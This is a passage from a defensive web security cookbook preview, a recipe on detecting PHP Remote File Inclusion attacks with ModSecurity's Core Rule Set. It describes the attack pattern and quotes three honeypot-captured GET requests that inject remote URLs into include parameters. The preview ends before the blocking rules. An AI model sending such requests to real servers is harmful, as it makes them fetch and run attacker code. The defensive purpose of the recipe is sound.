Recipe 9-5: Preventing Remote File Inclusion (RFI) Attacks
This recipe shows you how to identify when attackers attempt to force the application to execute code from a remote site.
Ingredients
- OWASP ModSecurity Core Rule Set (CRS)
- modsecurity_crs_40_generic_attacks.conf
- ModSecurity
- REQUEST_URI variable
- REQUEST_BODY variable
- REQUEST_HEADERS variable
- XML variable
- @rx operator
- @beginsWith operator
CAPEC-193: PHP Remote File Inclusion
In this pattern the attacker is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized “include” or “require” call, which the user can then control to point to any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions.
Sample Attacks
These attack examples were gathered from web honeypot sensors:
GET /videodb.class.xml.php?mosConfig_absolute_path=http://195.225.59
.42/a/l2.jpg?? HTTP/1.1
GET /shop/admin/includes/auth.inc.php?=http://damocom.net/bbs/data/
voip/link1.txt?? HTTP/1.1
GET /include/print_category.php?setup[use_category]=1&dir=http://
kesi.granc.hu/html/e107_images/clan/flags/banner.jpg??? HTTP/1.1Blocking RFI Attacks
The following examples are taken from the OWASP ModSecurity CRS modsecurity_crs_40_generic_attacks.conf file.
RFI Detection Challenges
When trying to use ...
Get Web Application Defender's Cookbook now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
